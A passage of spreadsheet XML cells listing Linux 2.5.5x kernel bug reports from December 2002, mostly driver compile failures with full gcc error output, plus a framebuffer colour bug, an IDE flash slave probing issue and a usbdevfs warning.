    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/net/irda/.vlsi_ir.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=vlsi_ir -DKBUILD_MODNAME=vlsi_ir -c -o drivers/net/irda/vlsi_ir.o drivers/net/irda/vlsi_ir.c In file included from drivers/net/irda/vlsi_ir.c:53: include/net/irda/vlsi_ir.h:30:40: missing binary operator before '(' make[3]: *** [drivers/net/irda/vlsi_ir.o] Error 1 make[2]: *** [drivers/net/irda] Error 2 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 Steps to reproduce: IrDA (infrared) support ---&gt; Infrared-port device drivers ---&gt; &lt;*&gt; VLSI 82C147 SIR/MIR/FIR (EXPERIMENTAL) CONFIG_VLSI_FIR=y</t>
  </si>
  <si>
    <t>compile failure on drivers/net/wan/sdlamain.c</t>
  </si>
  <si>
    <t>2002-12-24 06:05 UTC</t>
  </si>
  <si>
    <t>2003-12-17 17:50 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/net/wan/.sdlamain.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=sdlamain -DKBUILD_MODNAME=wanpipe -c -o drivers/net/wan/sdlamain.o drivers/net/wan/sdlamain.c drivers/net/wan/sdlamain.c:244: warning: type defaults to `int' in declaration of `DECLARE_TASK_QUEUE' drivers/net/wan/sdlamain.c:244: warning: parameter names (without types) in function declaration drivers/net/wan/sdlamain.c:244: warning: data definition has no type or storage class drivers/net/wan/sdlamain.c:245: variable `wanpipe_tq_task' has initializer but incomplete type drivers/net/wan/sdlamain.c:247: unknown field `routine' specified in initializer drivers/net/wan/sdlamain.c:247: warning: excess elements in struct initializer drivers/net/wan/sdlamain.c:247: warning: (near initialization for `wanpipe_tq_task') drivers/net/wan/sdlamain.c:248: unknown field `data' specified in initializer drivers/net/wan/sdlamain.c:249: `wanpipe_tq_custom' undeclared here (not in a function) drivers/net/wan/sdlamain.c:249: warning: excess elements in struct initializer drivers/net/wan/sdlamain.c:249: warning: (near initialization for `wanpipe_tq_task') drivers/net/wan/sdlamain.c: In function `run_wanpipe_tq': drivers/net/wan/sdlamain.c:1289: `task_queue' undeclared (first use in this function) drivers/net/wan/sdlamain.c:1289: (Each undeclared identifier is reported only once drivers/net/wan/sdlamain.c:1289: for each function it appears in.) drivers/net/wan/sdlamain.c:1289: `tq_queue' undeclared (first use in this function) drivers/net/wan/sdlamain.c:1289: parse error before ')' token drivers/net/wan/sdlamain.c:1292: warning: implicit declaration of function `run_task_queue' drivers/net/wan/sdlamain.c: In function `wanpipe_queue_tq': drivers/net/wan/sdlamain.c:1302: warning: implicit declaration of function `queue_task' drivers/net/wan/sdlamain.c:1302: `wanpipe_tq_custom' undeclared (first use in this function) drivers/net/wan/sdlamain.c: In function `wanpipe_mark_bh': drivers/net/wan/sdlamain.c:1309: `tq_immediate' undeclared (first use in this function) drivers/net/wan/sdlamain.c:1310: warning: implicit declaration of function `mark_bh' drivers/net/wan/sdlamain.c:1310: `IMMEDIATE_BH' undeclared (first use in this function) include/net/route.h: At top level: drivers/net/wan/sdlamain.c:245: storage size of `wanpipe_tq_task' isn't known make[3]: *** [drivers/net/wan/sdlamain.o] Error 1 make[2]: *** [drivers/net/wan] Error 2 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Network device support ---&gt; Wan interfaces ---&gt; [*] WAN router drivers &lt;*&gt; Sangoma WANPIPE(tm) multiprotocol cards CONFIG_VENDOR_SANGOMA=y</t>
  </si>
  <si>
    <t>compile failure on drivers/net/rcpci45.c</t>
  </si>
  <si>
    <t>2002-12-24 06:10 UTC</t>
  </si>
  <si>
    <t>2003-04-20 09:26 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/net/.rcpci45.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fn o-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq - Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=rcpci45 -DKBUILD_MODNAME=rc pci -c -o drivers/net/rcpci45.o drivers/net/rcpci45.c drivers/net/rcpci45.c:50:2: #error Please convert me to Documentation/DMA-mapping.txt make[2]: *** [drivers/net/rcpci45.o] Error 1 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Network device support ---&gt; &lt;*&gt; Red Creek Hardware VPN (EXPERIMENTAL) CONFIG_RCPCI=y</t>
  </si>
  <si>
    <t>broken colors on framebuffer console</t>
  </si>
  <si>
    <t>2002-12-24 15:01 UTC</t>
  </si>
  <si>
    <t>Lars Noschinski</t>
  </si>
  <si>
    <t>2003-11-26 16:13 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.52 Distribution: Debian unstable Hardware Environment: Athlon K7, Geforce256 Software Environment: rivafb, fbcon Problem Description: If rivafb is compiled into the kernel and no resolution is given via the "video=riva:$mode" kernel parameter, the screen colors are messed up. Instead of grey on black, the standard colors are black on black, and other colors (fore- and background) are also wrong. Steps to reproduce: Compile a kernel with built-in rivafb. Start it without a video=riva:$mode parameter.</t>
  </si>
  <si>
    <t>Cirrus Logic Framebuffer -- Does not compile</t>
  </si>
  <si>
    <t>2002-12-24 15:39 UTC</t>
  </si>
  <si>
    <t>John Weber</t>
  </si>
  <si>
    <t>2004-06-29 11:43 UTC</t>
  </si>
  <si>
    <t>David T Eger</t>
  </si>
  <si>
    <t>Matrox Framebuffer -- Does not compile</t>
  </si>
  <si>
    <t>2002-12-25 05:47 UTC</t>
  </si>
  <si>
    <t>2003-06-11 09:10 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: ftp.kernel.org mirror Hardware Environment: Dual PII 233 Mhz LX Software Environment: Debian unstable Problem Description: Matrox Framebuffer -- Does not compile Steps to reproduce: CONFIG_FB=y CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y CONFIG_FB_MATROX=m CONFIG_FB_MATROX_MILLENIUM=y # make modules</t>
  </si>
  <si>
    <t>Andr</t>
  </si>
  <si>
    <t>Matthew Dharm</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/ini9100u.c</t>
  </si>
  <si>
    <t>2002-12-29 17:50 UTC</t>
  </si>
  <si>
    <t>Steven Barnhart</t>
  </si>
  <si>
    <t>2005-07-05 12:01 UTC</t>
  </si>
  <si>
    <t>Mike Christie</t>
  </si>
  <si>
    <t>707 1178</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Red Hat 8 Hardware Environment: Intel i810, Intel Celeron 1.06 GHZ Software Environment: gcc 3.2 Problem Description: When compiling SCSI driver for Initio host adaptor I recieve the following error: gcc -Wp,-MD,drivers/scsi/.ini9100u.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=ini9100u -DKBUILD_MODNAME=initio -c -o drivers/scsi/ini9100u.o drivers/scsi/ini9100u.c drivers/scsi/ini9100u.c:111:2: #error Please convert me to Documentation/DMA-mapping.txt drivers/scsi/ini9100u.c:144: unknown field `next' specified in initializer drivers/scsi/ini9100u.c:144: warning: initialization from incompatible pointer type drivers/scsi/ini9100u.c:144: warning: initialization from incompatible pointer type drivers/scsi/ini9100u.c: In function `i91uBuildSCB': drivers/scsi/ini9100u.c:492: structure has no member named `address' drivers/scsi/ini9100u.c:501: structure has no member named `address' make[2]: *** [drivers/scsi/ini9100u.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI Device Support -&gt; SCSI Low-level Drivers -&gt; Initio 9100u(w)= y</t>
  </si>
  <si>
    <t>Incorrect disabling of mate drive</t>
  </si>
  <si>
    <t>2002-12-30 04:12 UTC</t>
  </si>
  <si>
    <t>Richard Tresidder</t>
  </si>
  <si>
    <t>2003-03-06 13:49 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version:All versions 2.2.xx 2.4.xx 2.5.xx Distribution: Original kernel Hardware Environment: Intel i386 etc Software Environment: Problem Description: Incorrect disabling of mate drive. There is a section in the "drivers/ide/ide-probe.c" file which is used to quote "/* * Prevent long system lockup probing later for non-existant * slave drive if the hwif is actually a flash memory card of some variety: */ " The block of code following this section however is cabable of diabling a master harddrive when the flash card is actually the slave!!! You can get around this by actually telling the kernel at boot that the master (Standard Harddrive) is a flash by "hda=flash" but this is a little bit wrong!! I have gone through most of the code regarding flash disks on the ide bus and have found absolutely no reason to single them out from any other ide device. I would patch this section myself but I can't really say I know all the little bits and peices to make it neat. This is a very important feature for ANY embedded system!!! since they will very often be using these ide flash cards. Steps to reproduce: Place any type of IDE flash card onto a slave device with a standard harddrive on the master and the master will not be made available to linux!!! Cheers Richard Tresidder rtresidd@tresar-electronics.com.au PS I don't suppose I get a reply to this message when it is read????</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/pci2220i.c</t>
  </si>
  <si>
    <t>2002-12-30 12:38 UTC</t>
  </si>
  <si>
    <t>2005-07-05 11:55 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.pci2220i.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=pci2220i -DKBUILD_MODNAME=pci2220i -c -o drivers/scsi/pci2220i.o drivers/scsi/pci2220i.c drivers/scsi/pci2220i.c:37:2: #error Convert me to understand page+offset based scatterlists drivers/scsi/pci2220i.c: In function `WalkScatGath': drivers/scsi/pci2220i.c:470: structure has no member named `address' drivers/scsi/pci2220i.c: In function `Pci2220i_QueueCommand': drivers/scsi/pci2220i.c:2056: structure has no member named `address' drivers/scsi/pci2220i.c: At top level: drivers/scsi/pci2220i.c:2925: warning: initialization from incompatible pointer type drivers/scsi/pci2220i.c:2925: warning: initialization from incompatible pointer type make[2]: *** [drivers/scsi/pci2220i.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; PCI2220i support CONFIG_SCSI_PCI2220I=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/dpt_i2o.c</t>
  </si>
  <si>
    <t>2002-12-30 12:41 UTC</t>
  </si>
  <si>
    <t>2005-07-05 12:08 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.dpt_i2o.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=dpt_i2o -DKBUILD_MODNAME=dpt_i2o -c -o drivers/scsi/dpt_i2o.o drivers/scsi/dpt_i2o.c drivers/scsi/dpt_i2o.c:32:2: #error Please convert me to Documentation/DMA-mapping.txt drivers/scsi/dpt_i2o.c: In function `adpt_i2o_post_wait': drivers/scsi/dpt_i2o.c:1138: warning: operation on `adpt_post_wait_id' may be undefined drivers/scsi/dpt_i2o.c: In function `adpt_scsi_to_i2o': drivers/scsi/dpt_i2o.c:2138: structure has no member named `address' drivers/scsi/hosts.h: At top level: drivers/scsi/dpt_i2o.c:165: warning: `dptids' defined but not used make[2]: *** [drivers/scsi/dpt_i2o.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; Adaptec I2O RAID support CONFIG_SCSI_DPT_I2O=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/53c7,8xx.c</t>
  </si>
  <si>
    <t>2002-12-30 12:48 UTC</t>
  </si>
  <si>
    <t>2005-07-05 12:00 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.53c7_8xx.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=53c7_8xx -DKBUILD_MODNAME=53c7_8xx -c -o drivers/scsi/53c7,8xx.o drivers/scsi/53c7,8xx.c drivers/scsi/53c7,8xx.c:65:2: #error Please convert me to Documentation/DMA-mapping.txt drivers/scsi/53c7,8xx.c: In function `NCR53c7x0_init': drivers/scsi/53c7,8xx.c:1107: structure has no member named `next' drivers/scsi/53c7,8xx.c: In function `NCR53c7xx_detect': drivers/scsi/53c7,8xx.c:1554: too many arguments to function `normal_init' drivers/scsi/53c7,8xx.c: In function `NCR53c8xx_run_tests': drivers/scsi/53c7,8xx.c:1829: warning: implicit declaration of function `save_flags' drivers/scsi/53c7,8xx.c:1830: warning: implicit declaration of function `cli' drivers/scsi/53c7,8xx.c:1833: warning: implicit declaration of function `restore_flags' drivers/scsi/53c7,8xx.c: In function `allocate_cmd': drivers/scsi/53c7,8xx.c:3455: structure has no member named `has_cmdblocks' drivers/scsi/53c7,8xx.c: In function `create_cmd': drivers/scsi/53c7,8xx.c:3784: structure has no member named `address' drivers/scsi/53c7,8xx.c: In function `process_issue_queue': drivers/scsi/53c7,8xx.c:4102: structure has no member named `next' drivers/scsi/53c7,8xx.c: In function `NCR53c7x0_intr': drivers/scsi/53c7,8xx.c:4399: structure has no member named `next' drivers/scsi/53c7,8xx.c: In function `intr_bf': drivers/scsi/53c7,8xx.c:5084: structure has no member named `pcidev' drivers/scsi/53c7,8xx.c: In function `insn_to_offset': drivers/scsi/53c7,8xx.c:5750: structure has no member named `address' drivers/scsi/53c7,8xx.c:5751: structure has no member named `address' drivers/scsi/53c7,8xx.c:5759: structure has no member named `address' drivers/scsi/53c7,8xx.c: At top level: drivers/scsi/53c7,8xx.c:6431: warning: initialization from incompatible pointer type drivers/scsi/53c7,8xx.c:6431: warning: initialization from incompatible pointer type make[2]: *** [drivers/scsi/53c7,8xx.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; NCR53c7,8xx SCSI support CONFIG_SCSI_NCR53C7xx=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/tmscsim.c</t>
  </si>
  <si>
    <t>2002-12-30 12:54 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.tmscsim.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=tmscsim -DKBUILD_MODNAME=tmscsim -c -o drivers/scsi/tmscsim.o drivers/scsi/tmscsim.c drivers/scsi/tmscsim.c: In function `DC390_waiting_timed_out': drivers/scsi/tmscsim.c:1074: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:1078: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c: In function `dc390_BuildSRB': drivers/scsi/tmscsim.c:1146: structure has no member named `address' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c:9:2: #error Please convert me to Documentation/DMA-mapping.txt In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `DC390_Interrupt': drivers/scsi/scsiiom.c:267: `DC390_LOCK_IO' undeclared (first use in this function) drivers/scsi/scsiiom.c:267: (Each undeclared identifier is reported only once drivers/scsi/scsiiom.c:267: for each function it appears in.) drivers/scsi/scsiiom.c:343: `DC390_UNLOCK_IO' undeclared (first use in this function) drivers/scsi/scsiiom.c:229: warning: unused variable `iflags' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `dc390_DataOut_0': drivers/scsi/scsiiom.c:384: structure has no member named `address' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `dc390_DataIn_0': drivers/scsi/scsiiom.c:448: structure has no member named `address' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `dc390_restore_ptr': drivers/scsi/scsiiom.c:747: structure has no member named `address' drivers/scsi/scsiiom.c:761: structure has no member named `address' drivers/scsi/scsiiom.c:764: structure has no member named `address' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `dc390_DataIO_Comm': drivers/scsi/scsiiom.c:898: structure has no member named `address' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `dc390_SRBdone': drivers/scsi/scsiiom.c:1373: structure has no member named `address' drivers/scsi/scsiiom.c:1448: structure has no member named `address' drivers/scsi/scsiiom.c:1523: structure has no member named `address' In file included from drivers/scsi/tmscsim.c:1825: drivers/scsi/scsiiom.c: In function `dc390_RequestSense': drivers/scsi/scsiiom.c:1764: structure has no member named `address' drivers/scsi/tmscsim.c: In function `dc390_inquiry': drivers/scsi/tmscsim.c:2403: request for member `rq_status' in something not a structure or union drivers/scsi/tmscsim.c: In function `dc390_sendstart': drivers/scsi/tmscsim.c:2453: request for member `rq_status' in something not a structure or union drivers/scsi/tmscsim.c: In function `dc390_set_info': drivers/scsi/tmscsim.c:2560: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2609: `p' undeclared (first use in this function) drivers/scsi/tmscsim.c:2635: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2637: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2655: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2658: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2661: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2673: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2686: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2724: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2731: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2741: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2749: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2755: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2763: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2769: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2778: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2785: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2793: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2800: warning: passing arg 1 of `strsep' makes pointer from integer without a cast drivers/scsi/tmscsim.c:2809: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c:2817: request for member `pScsiHost' in something not a structure or union drivers/scsi/tmscsim.c: At top level: drivers/scsi/tmscsim.c:3059: warning: initialization from incompatible pointer type drivers/scsi/tmscsim.c:3059: warning: initialization from incompatible pointer type drivers/scsi/tmscsim.c:277: warning: `tmscsim_pci_tbl' defined but not used make[2]: *** [drivers/scsi/tmscsim.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; Tekram DC390(T) and Am53/79C974 SCSI support CONFIG_SCSI_DC390T=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/gdth.c</t>
  </si>
  <si>
    <t>2002-12-30 13:02 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.gdth.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=gdth -DKBUILD_MODNAME=gdth -c -o drivers/scsi/gdth.o drivers/scsi/gdth.c drivers/scsi/gdth.c:298:2: #error Please convert me to Documentation/DMA-mapping.txt In file included from drivers/scsi/gdth.c:703: drivers/scsi/gdth_proc.c: In function `gdth_do_cmd': drivers/scsi/gdth_proc.c:1269: request for member `rq_status' in something not a structure or union drivers/scsi/gdth_proc.c:1271: request for member `waiting' in something not a structure or union drivers/scsi/gdth_proc.c: In function `gdth_scsi_done': drivers/scsi/gdth_proc.c:1291: request for member `rq_status' in something not a structure or union drivers/scsi/gdth_proc.c:1294: request for member `waiting' in something not a structure or union drivers/scsi/gdth_proc.c:1295: request for member `waiting' in something not a structure or union In file included from drivers/scsi/gdth.c:703: drivers/scsi/gdth_proc.c:1393:38: macro "GDTH_LOCK_SCSI_DONE" requires 2 arguments, but only 1 given In file included from drivers/scsi/gdth.c:703: drivers/scsi/gdth_proc.c: In function `gdth_wait_completion': drivers/scsi/gdth_proc.c:1393: `GDTH_LOCK_SCSI_DONE' undeclared (first use in this function) drivers/scsi/gdth_proc.c:1393: (Each undeclared identifier is reported only once drivers/scsi/gdth_proc.c:1393: for each function it appears in.) drivers/scsi/gdth_proc.c:1395: `dev' undeclared (first use in this function) drivers/scsi/gdth.c: In function `gdth_copy_internal_data': drivers/scsi/gdth.c:2632: structure has no member named `address' drivers/scsi/gdth.c:2632: structure has no member named `address' drivers/scsi/gdth.c: In function `gdth_fill_cache_cmd': drivers/scsi/gdth.c:2807: structure has no member named `address' drivers/scsi/gdth.c: In function `gdth_fill_raw_cmd': drivers/scsi/gdth.c:2924: structure has no member named `address' drivers/scsi/gdth.c:3345:46: macro "GDTH_UNLOCK_SCSI_DONE" passed 2 arguments, but takes just 1 drivers/scsi/gdth.c: In function `gdth_interrupt': drivers/scsi/gdth.c:3345: `GDTH_UNLOCK_SCSI_DONE' undeclared (first use in this function) drivers/scsi/gdth.c: At top level: drivers/scsi/gdth.c:4726: warning: initialization from incompatible pointer type drivers/scsi/gdth.c:4726: warning: initialization from incompatible pointer type drivers/scsi/gdth.c:807: warning: `gdthtable' defined but not used make[2]: *** [drivers/scsi/gdth.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; Intel/ICP (former GDT SCSI Disk Array) RAID Controller support CONFIG_SCSI_GDTH=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/eata_dma.c</t>
  </si>
  <si>
    <t>2002-12-30 13:06 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.eata_dma.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=eata_dma -DKBUILD_MODNAME=eata_dma -c -o drivers/scsi/eata_dma.o drivers/scsi/eata_dma.c drivers/scsi/eata_dma.c:66:2: #error Please convert me to Documentation/DMA-mapping.txt drivers/scsi/eata_dma.c: In function `eata_int_handler': drivers/scsi/eata_dma.c:296: warning: implicit declaration of function `DELAY' drivers/scsi/eata_dma.c: In function `eata_queue': drivers/scsi/eata_dma.c:465: warning: implicit declaration of function `save_flags' drivers/scsi/eata_dma.c:466: warning: implicit declaration of function `cli' drivers/scsi/eata_dma.c:487: warning: implicit declaration of function `restore_flags' drivers/scsi/eata_dma.c:576: structure has no member named `address' drivers/scsi/eata_dma.c:576: structure has no member named `address' drivers/scsi/eata_dma.c:576: structure has no member named `address' drivers/scsi/eata_dma.c: In function `eata_select_queue_depths': drivers/scsi/eata_dma.c:813: structure has no member named `next' drivers/scsi/eata_dma.c:849: structure has no member named `next' drivers/scsi/eata_dma.c:855: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:858: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:862: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:867: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:872: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:880: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:881: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:882: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:883: structure has no member named `queue_depth' drivers/scsi/eata_dma.c:887: structure has no member named `queue_depth' drivers/scsi/eata_dma.c: In function `register_HBA': drivers/scsi/eata_dma.c:1195: structure has no member named `select_queue_depths' drivers/scsi/eata_dma.c: In function `find_PCI': drivers/scsi/eata_dma.c:1420: structure has no member named `name' drivers/scsi/eata_dma.c:1426: structure has no member named `name' drivers/scsi/eata_dma.c: At top level: drivers/scsi/eata_dma.c:1553: warning: initialization from incompatible pointer type drivers/scsi/eata_dma.c:1553: warning: initialization from incompatible pointer type make[2]: *** [drivers/scsi/eata_dma.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; EATA-DMA [Obsolete] (DPT, NEC, AT&amp;T, SNI, AST, Olivetti, Alphatronix) support CONFIG_SCSI_EATA_DMA=y</t>
  </si>
  <si>
    <t>usbdevfs is depreciated message always printed even when usbdevfs is not mounted.</t>
  </si>
  <si>
    <t>2002-12-30 16:32 UTC</t>
  </si>
  <si>
    <t>2003-07-11 17:18 UTC</t>
  </si>
  <si>
    <t>In current 2.5 (.53 at the time of writing) the warning about the "usbdevfs" name being deprecated and replaced with "usbfs" is always printed, both with USB builtin and modular. Trouble seems to be that the HCD driver in: driver/usb/core/hcd.c:usb_register_bus() calls into driver/usb/core/inode.c:usbfs_add_bus() which then seeing as how it's the first bus calls driver/usb/core/inode.c:create_special_files() which invokes a get_mount() for both "usbdevfs" and "usbfs", causing the warning to always be printed.</t>
  </si>
  <si>
    <t>Parallel</t>
  </si>
  <si>
    <t>2003-01-01 06:26 UTC</t>
  </si>
  <si>
    <t>Nick Holloway</t>
  </si>
  <si>
    <t>2003-01-10 16:29 UTC</t>
  </si>
  <si>
